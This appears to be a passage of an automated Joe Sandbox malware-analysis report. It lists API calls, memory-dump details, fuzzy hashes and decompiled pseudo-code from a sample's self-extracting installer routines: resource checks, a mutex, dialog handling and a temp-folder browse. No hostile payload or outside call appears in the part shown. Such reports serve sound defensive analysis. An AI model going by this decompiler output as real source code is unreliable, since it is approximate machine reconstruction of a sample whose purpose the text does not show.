                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a432b0
                                                                                                                                                                                                                                            0x00a432b6
                                                                                                                                                                                                                                            0x00a432b8
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a432be
                                                                                                                                                                                                                                            0x00a43280
                                                                                                                                                                                                                                            0x00a43289
                                                                                                                                                                                                                                            0x00a4328e
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a4328e
                                                                                                                                                                                                                                            0x00a4327b
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a4327b
                                                                                                                                                                                                                                            0x00000000

                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • LoadStringA.USER32(000003E8,00A48598,00000200), ref: 00A43271
                                                                                                                                                                                                                                            • GetDesktopWindow.USER32 ref: 00A433E2
                                                                                                                                                                                                                                            • SetWindowTextA.USER32(?,cent), ref: 00A433F7
                                                                                                                                                                                                                                            • SendDlgItemMessageA.USER32(?,00000835,000000C5,00000103,00000000), ref: 00A43410
                                                                                                                                                                                                                                            • GetDlgItem.USER32(?,00000836), ref: 00A43426
                                                                                                                                                                                                                                            • EnableWindow.USER32(00000000), ref: 00A4342D
                                                                                                                                                                                                                                            • EndDialog.USER32(?,00000000), ref: 00A4343F
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.352918915.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.352907150.0000000000A40000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.352946994.0000000000A48000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.352961042.0000000000A4A000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.352961042.0000000000A4C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_a40000_21fvBVFMsn.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Window$Item$DesktopDialogEnableLoadMessageSendStringText
                                                                                                                                                                                                                                            • String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\$cent
                                                                                                                                                                                                                                            • API String ID: 2418873061-3711820486
                                                                                                                                                                                                                                            • Opcode ID: c119a9d424ff28732ec8bce52e90d97e474810f1da196f7a5474bd16e060abc6
                                                                                                                                                                                                                                            • Instruction ID: 460f59df13bc7e300bbae8fccd2cb17bd1f12956e4c2931eabe4a34789cd5948
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: c119a9d424ff28732ec8bce52e90d97e474810f1da196f7a5474bd16e060abc6
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 3C514A3E380240B7FF619FB95C4CFBB2958DBE7B56F104128F2069A1D1CBA59E029261
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            C-Code - Quality: 93%
                                                                                                                                                                                                                                            			E00A42CAA(struct HINSTANCE__* __ecx, void* __edx, void* __eflags) {
                                                                                                                                                                                                                                            				signed int _v8;
                                                                                                                                                                                                                                            				char _v268;
                                                                                                                                                                                                                                            				void* __ebx;
                                                                                                                                                                                                                                            				void* __edi;
                                                                                                                                                                                                                                            				void* __esi;
                                                                                                                                                                                                                                            				signed int _t13;
                                                                                                                                                                                                                                            				void* _t20;
                                                                                                                                                                                                                                            				void* _t23;
                                                                                                                                                                                                                                            				void* _t27;
                                                                                                                                                                                                                                            				struct HRSRC__* _t31;
                                                                                                                                                                                                                                            				intOrPtr _t33;
                                                                                                                                                                                                                                            				void* _t43;
                                                                                                                                                                                                                                            				void* _t48;
                                                                                                                                                                                                                                            				signed int _t65;
                                                                                                                                                                                                                                            				struct HINSTANCE__* _t66;
                                                                                                                                                                                                                                            				signed int _t67;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_t13 =  *0xa48004; // 0x173b1603
                                                                                                                                                                                                                                            				_v8 = _t13 ^ _t67;
                                                                                                                                                                                                                                            				_t65 = 0;
                                                                                                                                                                                                                                            				_t66 = __ecx;
                                                                                                                                                                                                                                            				_t48 = __edx;
                                                                                                                                                                                                                                            				 *0xa49a3c = __ecx;
                                                                                                                                                                                                                                            				memset(0xa49140, 0, 0x8fc);
                                                                                                                                                                                                                                            				memset(0xa48a20, 0, 0x32c);
                                                                                                                                                                                                                                            				memset(0xa488c0, 0, 0x104);
                                                                                                                                                                                                                                            				 *0xa493ec = 1;
                                                                                                                                                                                                                                            				_t20 = E00A4468F("TITLE", 0xa49154, 0x7f);
                                                                                                                                                                                                                                            				if(_t20 == 0 || _t20 > 0x80) {
                                                                                                                                                                                                                                            					_t64 = 0x4b1;
                                                                                                                                                                                                                                            					goto L32;
                                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                                            					_t27 = CreateEventA(0, 1, 1, 0);
                                                                                                                                                                                                                                            					 *0xa4858c = _t27;
                                                                                                                                                                                                                                            					SetEvent(_t27);
                                                                                                                                                                                                                                            					_t64 = 0xa49a34;
                                                                                                                                                                                                                                            					if(E00A4468F("EXTRACTOPT", 0xa49a34, 4) != 0) {
                                                                                                                                                                                                                                            						if(( *0xa49a34 & 0x000000c0) == 0) {
                                                                                                                                                                                                                                            							L12:
                                                                                                                                                                                                                                            							 *0xa49120 =  *0xa49120 & _t65;
                                                                                                                                                                                                                                            							if(E00A45C9E(_t48, _t48, _t65, _t66) != 0) {
                                                                                                                                                                                                                                            								if( *0xa48a3a == 0) {
                                                                                                                                                                                                                                            									_t31 = FindResourceA(_t66, "VERCHECK", 0xa);
                                                                                                                                                                                                                                            									if(_t31 != 0) {
                                                                                                                                                                                                                                            										_t65 = LoadResource(_t66, _t31);
                                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                                            									if( *0xa48184 != 0) {
                                                                                                                                                                                                                                            										__imp__#17();
                                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                                            									if( *0xa48a24 == 0) {
                                                                                                                                                                                                                                            										_t57 = _t65;
                                                                                                                                                                                                                                            										if(E00A436EE(_t65) == 0) {
                                                                                                                                                                                                                                            											goto L33;
                                                                                                                                                                                                                                            										} else {
                                                                                                                                                                                                                                            											_t33 =  *0xa49a40; // 0x3
                                                                                                                                                                                                                                            											_t48 = 1;
                                                                                                                                                                                                                                            											if(_t33 == 1 || _t33 == 2 || _t33 == 3) {
                                                                                                                                                                                                                                            												if(( *0xa49a34 & 0x00000100) == 0 || ( *0xa48a38 & 0x00000001) != 0 || E00A418A3(_t64, _t66) != 0) {
                                                                                                                                                                                                                                            													goto L30;
                                                                                                                                                                                                                                            												} else {
                                                                                                                                                                                                                                            													_t64 = 0x7d6;
                                                                                                                                                                                                                                            													if(E00A46517(_t57, 0x7d6, _t34, E00A419E0, 0x547, 0x83e) != 0x83d) {
                                                                                                                                                                                                                                            														goto L33;
                                                                                                                                                                                                                                            													} else {
                                                                                                                                                                                                                                            														goto L30;
                                                                                                                                                                                                                                            													}
                                                                                                                                                                                                                                            												}
                                                                                                                                                                                                                                            											} else {
                                                                                                                                                                                                                                            												L30:
                                                                                                                                                                                                                                            												_t23 = _t48;
                                                                                                                                                                                                                                            											}
                                                                                                                                                                                                                                            										}
                                                                                                                                                                                                                                            									} else {
                                                                                                                                                                                                                                            										_t23 = 1;
                                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                                            								} else {
                                                                                                                                                                                                                                            									E00A42390(0xa48a3a);
                                                                                                                                                                                                                                            									goto L33;
                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                            							} else {
                                                                                                                                                                                                                                            								_t64 = 0x520;
                                                                                                                                                                                                                                            								L32:
                                                                                                                                                                                                                                            								E00A444B9(0, _t64, 0, 0, 0x10, 0);
                                                                                                                                                                                                                                            								goto L33;
                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                            						} else {
                                                                                                                                                                                                                                            							_t64 =  &_v268;
                                                                                                                                                                                                                                            							if(E00A4468F("INSTANCECHECK",  &_v268, 0x104) == 0) {
                                                                                                                                                                                                                                            								goto L3;
                                                                                                                                                                                                                                            							} else {
                                                                                                                                                                                                                                            								_t43 = CreateMutexA(0, 1,  &_v268);
                                                                                                                                                                                                                                            								 *0xa48588 = _t43;
                                                                                                                                                                                                                                            								if(_t43 == 0 || GetLastError() != 0xb7) {
                                                                                                                                                                                                                                            									goto L12;
                                                                                                                                                                                                                                            								} else {
                                                                                                                                                                                                                                            									if(( *0xa49a34 & 0x00000080) == 0) {
                                                                                                                                                                                                                                            										_t64 = 0x524;
                                                                                                                                                                                                                                            										if(E00A444B9(0, 0x524, ?str?, 0, 0x20, 4) == 6) {
                                                                                                                                                                                                                                            											goto L12;
                                                                                                                                                                                                                                            										} else {
                                                                                                                                                                                                                                            											goto L11;
                                                                                                                                                                                                                                            										}
                                                                                                                                                                                                                                            									} else {
                                                                                                                                                                                                                                            										_t64 = 0x54b;
                                                                                                                                                                                                                                            										E00A444B9(0, 0x54b, "cent", 0, 0x10, 0);
                                                                                                                                                                                                                                            										L11:
                                                                                                                                                                                                                                            										CloseHandle( *0xa48588);
                                                                                                                                                                                                                                            										 *0xa49124 = 0x800700b7;
                                                                                                                                                                                                                                            										goto L33;
                                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            					} else {
                                                                                                                                                                                                                                            						L3:
                                                                                                                                                                                                                                            						_t64 = 0x4b1;
                                                                                                                                                                                                                                            						E00A444B9(0, 0x4b1, 0, 0, 0x10, 0);
                                                                                                                                                                                                                                            						 *0xa49124 = 0x80070714;
                                                                                                                                                                                                                                            						L33:
                                                                                                                                                                                                                                            						_t23 = 0;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				return E00A46CE0(_t23, _t48, _v8 ^ _t67, _t64, _t65, _t66);
                                                                                                                                                                                                                                            			}



















                                                                                                                                                                                                                                            0x00a42e48
                                                                                                                                                                                                                                            0x00a42e30
                                                                                                                                                                                                                                            0x00a42e30
                                                                                                                                                                                                                                            0x00a42ef8
                                                                                                                                                                                                                                            0x00a42f01
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a42f01
                                                                                                                                                                                                                                            0x00a42d8a
                                                                                                                                                                                                                                            0x00a42d8f
                                                                                                                                                                                                                                            0x00a42da1
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a42da3
                                                                                                                                                                                                                                            0x00a42dae
                                                                                                                                                                                                                                            0x00a42db4
                                                                                                                                                                                                                                            0x00a42dbb
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a42dca
                                                                                                                                                                                                                                            0x00a42dd3
                                                                                                                                                                                                                                            0x00a42df5
                                                                                                                                                                                                                                            0x00a42e02
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a42dd5
                                                                                                                                                                                                                                            0x00a42dde
                                                                                                                                                                                                                                            0x00a42de3
                                                                                                                                                                                                                                            0x00a42e04
                                                                                                                                                                                                                                            0x00a42e0a
                                                                                                                                                                                                                                            0x00a42e10
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a42e10
                                                                                                                                                                                                                                            0x00a42dd3
                                                                                                                                                                                                                                            0x00a42dbb
                                                                                                                                                                                                                                            0x00a42da1
                                                                                                                                                                                                                                            0x00a42d5b
                                                                                                                                                                                                                                            0x00a42d5b
                                                                                                                                                                                                                                            0x00a42d5d
                                                                                                                                                                                                                                            0x00a42d69
                                                                                                                                                                                                                                            0x00a42d6e
                                                                                                                                                                                                                                            0x00a42f06
                                                                                                                                                                                                                                            0x00a42f06
                                                                                                                                                                                                                                            0x00a42f06
                                                                                                                                                                                                                                            0x00a42d59
                                                                                                                                                                                                                                            0x00a42f18

                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • memset.MSVCRT ref: 00A42CD9
                                                                                                                                                                                                                                            • memset.MSVCRT ref: 00A42CE9
                                                                                                                                                                                                                                            • memset.MSVCRT ref: 00A42CF9
                                                                                                                                                                                                                                              • Part of subcall function 00A4468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00A446A0
                                                                                                                                                                                                                                              • Part of subcall function 00A4468F: SizeofResource.KERNEL32(00000000,00000000,?,00A42D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00A446A9
                                                                                                                                                                                                                                              • Part of subcall function 00A4468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00A446C3
                                                                                                                                                                                                                                              • Part of subcall function 00A4468F: LoadResource.KERNEL32(00000000,00000000,?,00A42D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00A446CC
                                                                                                                                                                                                                                              • Part of subcall function 00A4468F: LockResource.KERNEL32(00000000,?,00A42D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00A446D3
                                                                                                                                                                                                                                              • Part of subcall function 00A4468F: memcpy_s.MSVCRT ref: 00A446E5
                                                                                                                                                                                                                                              • Part of subcall function 00A4468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 00A446EF
                                                                                                                                                                                                                                            • CreateEventA.KERNEL32(00000000,00000001,00000001,00000000,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00A42D34
                                                                                                                                                                                                                                            • SetEvent.KERNEL32(00000000,?,?,?,?,?,?,?,00000002,00000000), ref: 00A42D40
                                                                                                                                                                                                                                            • CreateMutexA.KERNEL32(00000000,00000001,?,00000104,00000004,?,?,?,?,?,?,?,00000002,00000000), ref: 00A42DAE
                                                                                                                                                                                                                                            • GetLastError.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 00A42DBD
                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(cent,00000000,00000020,00000004,?,?,?,?,?,?,?,00000002,00000000), ref: 00A42E0A
                                                                                                                                                                                                                                              • Part of subcall function 00A444B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00A44518
                                                                                                                                                                                                                                              • Part of subcall function 00A444B9: MessageBoxA.USER32(?,?,cent,00010010), ref: 00A44554
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.352918915.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.352907150.0000000000A40000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.352946994.0000000000A48000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.352961042.0000000000A4A000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.352961042.0000000000A4C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_a40000_21fvBVFMsn.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Resource$memset$CreateEventFindLoad$CloseErrorFreeHandleLastLockMessageMutexSizeofStringmemcpy_s
                                                                                                                                                                                                                                            • String ID: EXTRACTOPT$INSTANCECHECK$TITLE$VERCHECK$cent
                                                                                                                                                                                                                                            • API String ID: 1002816675-2654900392
                                                                                                                                                                                                                                            • Opcode ID: edbd9976a6c9244c9434605c35d03faf363d2754bcac15ce0861812a58745605
                                                                                                                                                                                                                                            • Instruction ID: 0511f5e3013b04fc1ca590d142ace44fe4b04af75c7b8d4ecbc4e709ab52cedd
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: edbd9976a6c9244c9434605c35d03faf363d2754bcac15ce0861812a58745605
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: DF51D47C740341ABE760EBA49D4BB7B2AA8EBD6740F804139F941D51D1DBF98C92C722
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            C-Code - Quality: 81%
                                                                                                                                                                                                                                            			E00A434F0(struct HWND__* _a4, intOrPtr _a8, int _a12) {
                                                                                                                                                                                                                                            				void* _t9;
                                                                                                                                                                                                                                            				void* _t12;
                                                                                                                                                                                                                                            				void* _t13;
                                                                                                                                                                                                                                            				void* _t17;
                                                                                                                                                                                                                                            				void* _t23;
                                                                                                                                                                                                                                            				void* _t25;
                                                                                                                                                                                                                                            				struct HWND__* _t35;
                                                                                                                                                                                                                                            				struct HWND__* _t38;
                                                                                                                                                                                                                                            				void* _t39;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_t9 = _a8 - 0x10;
                                                                                                                                                                                                                                            				if(_t9 == 0) {
                                                                                                                                                                                                                                            					__eflags = 1;
                                                                                                                                                                                                                                            					L19:
                                                                                                                                                                                                                                            					_push(0);
                                                                                                                                                                                                                                            					 *0xa491d8 = 1;
                                                                                                                                                                                                                                            					L20:
                                                                                                                                                                                                                                            					_push(_a4);
                                                                                                                                                                                                                                            					L21:
                                                                                                                                                                                                                                            					EndDialog();
                                                                                                                                                                                                                                            					L22:
                                                                                                                                                                                                                                            					return 1;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				_push(1);
                                                                                                                                                                                                                                            				_pop(1);
                                                                                                                                                                                                                                            				_t12 = _t9 - 0xf2;
                                                                                                                                                                                                                                            				if(_t12 == 0) {
                                                                                                                                                                                                                                            					__eflags = _a12 - 0x1b;
                                                                                                                                                                                                                                            					if(_a12 != 0x1b) {
                                                                                                                                                                                                                                            						goto L22;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					goto L19;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				_t13 = _t12 - 0xe;
                                                                                                                                                                                                                                            				if(_t13 == 0) {
                                                                                                                                                                                                                                            					_t35 = _a4;
                                                                                                                                                                                                                                            					 *0xa48584 = _t35;
                                                                                                                                                                                                                                            					E00A443D0(_t35, GetDesktopWindow());
                                                                                                                                                                                                                                            					__eflags =  *0xa48184; // 0x1
                                                                                                                                                                                                                                            					if(__eflags != 0) {
                                                                                                                                                                                                                                            						SendMessageA(GetDlgItem(_t35, 0x83b), 0x464, 0, 0xbb9);
                                                                                                                                                                                                                                            						SendMessageA(GetDlgItem(_t35, 0x83b), 0x465, 0xffffffff, 0xffff0000);
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					SetWindowTextA(_t35, "cent");
                                                                                                                                                                                                                                            					_t17 = CreateThread(0, 0, E00A44FE0, 0, 0, 0xa48798);
                                                                                                                                                                                                                                            					 *0xa4879c = _t17;
                                                                                                                                                                                                                                            					__eflags = _t17;
                                                                                                                                                                                                                                            					if(_t17 != 0) {
                                                                                                                                                                                                                                            						goto L22;
                                                                                                                                                                                                                                            					} else {
                                                                                                                                                                                                                                            						E00A444B9(_t35, 0x4b8, 0, 0, 0x10, 0);
                                                                                                                                                                                                                                            						_push(0);
                                                                                                                                                                                                                                            						_push(_t35);
                                                                                                                                                                                                                                            						goto L21;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				_t23 = _t13 - 1;
                                                                                                                                                                                                                                            				if(_t23 == 0) {
                                                                                                                                                                                                                                            					__eflags = _a12 - 2;
                                                                                                                                                                                                                                            					if(_a12 != 2) {
                                                                                                                                                                                                                                            						goto L22;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					ResetEvent( *0xa4858c);
                                                                                                                                                                                                                                            					_t38 =  *0xa48584; // 0x0
                                                                                                                                                                                                                                            					_t25 = E00A444B9(_t38, 0x4b2, 0xa41140, 0, 0x20, 4);
                                                                                                                                                                                                                                            					__eflags = _t25 - 6;
                                                                                                                                                                                                                                            					if(_t25 == 6) {
                                                                                                                                                                                                                                            						L11:
                                                                                                                                                                                                                                            						 *0xa491d8 = 1;
                                                                                                                                                                                                                                            						SetEvent( *0xa4858c);
                                                                                                                                                                                                                                            						_t39 =  *0xa4879c; // 0x0
                                                                                                                                                                                                                                            						E00A43680(_t39);
                                                                                                                                                                                                                                            						_push(0);
                                                                                                                                                                                                                                            						goto L20;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					__eflags = _t25 - 1;
                                                                                                                                                                                                                                            					if(_t25 == 1) {
                                                                                                                                                                                                                                            						goto L11;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					SetEvent( *0xa4858c);
                                                                                                                                                                                                                                            					goto L22;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				if(_t23 == 0xe90) {
                                                                                                                                                                                                                                            					TerminateThread( *0xa4879c, 0);
                                                                                                                                                                                                                                            					EndDialog(_a4, _a12);
                                                                                                                                                                                                                                            					return 1;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				return 0;
                                                                                                                                                                                                                                            			}












                                                                                                                                                                                                                                            0x00a43535
                                                                                                                                                                                                                                            0x00a43541
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a43549
                                                                                                                                                                                                                                            0x00000000

                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • TerminateThread.KERNEL32(00000000), ref: 00A43535
                                                                                                                                                                                                                                            • EndDialog.USER32(?,?), ref: 00A43541
                                                                                                                                                                                                                                            • ResetEvent.KERNEL32 ref: 00A4355F
                                                                                                                                                                                                                                            • SetEvent.KERNEL32(00A41140,00000000,00000020,00000004), ref: 00A43590
                                                                                                                                                                                                                                            • GetDesktopWindow.USER32 ref: 00A435C7
                                                                                                                                                                                                                                            • GetDlgItem.USER32(?,0000083B), ref: 00A435F1
                                                                                                                                                                                                                                            • SendMessageA.USER32(00000000), ref: 00A435F8
                                                                                                                                                                                                                                            • GetDlgItem.USER32(?,0000083B), ref: 00A43610
                                                                                                                                                                                                                                            • SendMessageA.USER32(00000000), ref: 00A43617
                                                                                                                                                                                                                                            • SetWindowTextA.USER32(?,cent), ref: 00A43623
                                                                                                                                                                                                                                            • CreateThread.KERNEL32 ref: 00A43637
                                                                                                                                                                                                                                            • EndDialog.USER32(?,00000000), ref: 00A43671
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.352918915.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.352907150.0000000000A40000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.352946994.0000000000A48000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.352961042.0000000000A4A000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.352961042.0000000000A4C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_a40000_21fvBVFMsn.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: DialogEventItemMessageSendThreadWindow$CreateDesktopResetTerminateText
                                                                                                                                                                                                                                            • String ID: cent
                                                                                                                                                                                                                                            • API String ID: 2406144884-3940384054
                                                                                                                                                                                                                                            • Opcode ID: 1c5605e96eac45e000f28b202c3b8037a59d93b502a5aa089fe9ac531e547ef1
                                                                                                                                                                                                                                            • Instruction ID: 4f7e83a29a0321b9e7984433075f7660c1310d72501e7b711d04368c5a45a680
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 1c5605e96eac45e000f28b202c3b8037a59d93b502a5aa089fe9ac531e547ef1
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: D831E97E284301BBEB209FA9FC0DE2B7A75E7D6B01F104615F602952B1CB768912DB51
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            C-Code - Quality: 50%
                                                                                                                                                                                                                                            			E00A44224(char __ecx) {
                                                                                                                                                                                                                                            				char* _v8;
                                                                                                                                                                                                                                            				_Unknown_base(*)()* _v12;
                                                                                                                                                                                                                                            				_Unknown_base(*)()* _v16;
                                                                                                                                                                                                                                            				_Unknown_base(*)()* _v20;
                                                                                                                                                                                                                                            				char* _v28;
                                                                                                                                                                                                                                            				intOrPtr _v32;
                                                                                                                                                                                                                                            				intOrPtr _v36;
                                                                                                                                                                                                                                            				intOrPtr _v40;
                                                                                                                                                                                                                                            				char _v44;
                                                                                                                                                                                                                                            				char _v48;
                                                                                                                                                                                                                                            				char _v52;
                                                                                                                                                                                                                                            				_Unknown_base(*)()* _t26;
                                                                                                                                                                                                                                            				_Unknown_base(*)()* _t28;
                                                                                                                                                                                                                                            				_Unknown_base(*)()* _t29;
                                                                                                                                                                                                                                            				_Unknown_base(*)()* _t32;
                                                                                                                                                                                                                                            				char _t42;
                                                                                                                                                                                                                                            				char* _t44;
                                                                                                                                                                                                                                            				char* _t61;
                                                                                                                                                                                                                                            				void* _t63;
                                                                                                                                                                                                                                            				char* _t65;
                                                                                                                                                                                                                                            				struct HINSTANCE__* _t66;
                                                                                                                                                                                                                                            				char _t67;
                                                                                                                                                                                                                                            				void* _t71;
                                                                                                                                                                                                                                            				char _t76;
                                                                                                                                                                                                                                            				intOrPtr _t85;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_t67 = __ecx;
                                                                                                                                                                                                                                            				_t66 = LoadLibraryA("SHELL32.DLL");
                                                                                                                                                                                                                                            				if(_t66 == 0) {
                                                                                                                                                                                                                                            					_t63 = 0x4c2;
                                                                                                                                                                                                                                            					L22:
                                                                                                                                                                                                                                            					E00A444B9(_t67, _t63, 0, 0, 0x10, 0);
                                                                                                                                                                                                                                            					return 0;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				_t26 = GetProcAddress(_t66, "SHBrowseForFolder");
                                                                                                                                                                                                                                            				_v12 = _t26;
                                                                                                                                                                                                                                            				if(_t26 == 0) {
                                                                                                                                                                                                                                            					L20:
                                                                                                                                                                                                                                            					FreeLibrary(_t66);
                                                                                                                                                                                                                                            					_t63 = 0x4c1;
                                                                                                                                                                                                                                            					goto L22;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				_t28 = GetProcAddress(_t66, 0xc3);
                                                                                                                                                                                                                                            				_v20 = _t28;
                                                                                                                                                                                                                                            				if(_t28 == 0) {
                                                                                                                                                                                                                                            					goto L20;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				_t29 = GetProcAddress(_t66, "SHGetPathFromIDList");
                                                                                                                                                                                                                                            				_v16 = _t29;
                                                                                                                                                                                                                                            				if(_t29 == 0) {
                                                                                                                                                                                                                                            					goto L20;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				_t76 =  *0xa488c0; // 0x0
                                                                                                                                                                                                                                            				if(_t76 != 0) {
                                                                                                                                                                                                                                            					L10:
                                                                                                                                                                                                                                            					 *0xa487a0 = 0;
                                                                                                                                                                                                                                            					_v52 = _t67;
                                                                                                                                                                                                                                            					_v48 = 0;
                                                                                                                                                                                                                                            					_v44 = 0;
                                                                                                                                                                                                                                            					_v40 = 0xa48598;
                                                                                                                                                                                                                                            					_v36 = 1;
                                                                                                                                                                                                                                            					_v32 = E00A44200;
                                                                                                                                                                                                                                            					_v28 = 0xa488c0;
                                                                                                                                                                                                                                            					 *0xa4a288( &_v52);
                                                                                                                                                                                                                                            					_t32 =  *_v12();
                                                                                                                                                                                                                                            					if(_t71 != _t71) {
                                                                                                                                                                                                                                            						asm("int 0x29");
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					_v12 = _t32;
                                                                                                                                                                                                                                            					if(_t32 != 0) {
                                                                                                                                                                                                                                            						 *0xa4a288(_t32, 0xa488c0);
                                                                                                                                                                                                                                            						 *_v16();
                                                                                                                                                                                                                                            						if(_t71 != _t71) {
                                                                                                                                                                                                                                            							asm("int 0x29");
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						if( *0xa488c0 != 0) {
                                                                                                                                                                                                                                            							E00A41680(0xa487a0, 0x104, 0xa488c0);
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						 *0xa4a288(_v12);
                                                                                                                                                                                                                                            						 *_v20();
                                                                                                                                                                                                                                            						if(_t71 != _t71) {
                                                                                                                                                                                                                                            							asm("int 0x29");
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					FreeLibrary(_t66);
                                                                                                                                                                                                                                            					_t85 =  *0xa487a0; // 0x0
                                                                                                                                                                                                                                            					return 0 | _t85 != 0x00000000;
                                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                                            					GetTempPathA(0x104, 0xa488c0);
                                                                                                                                                                                                                                            					_t61 = 0xa488c0;
                                                                                                                                                                                                                                            					_t4 =  &(_t61[1]); // 0xa488c1
                                                                                                                                                                                                                                            					_t65 = _t4;
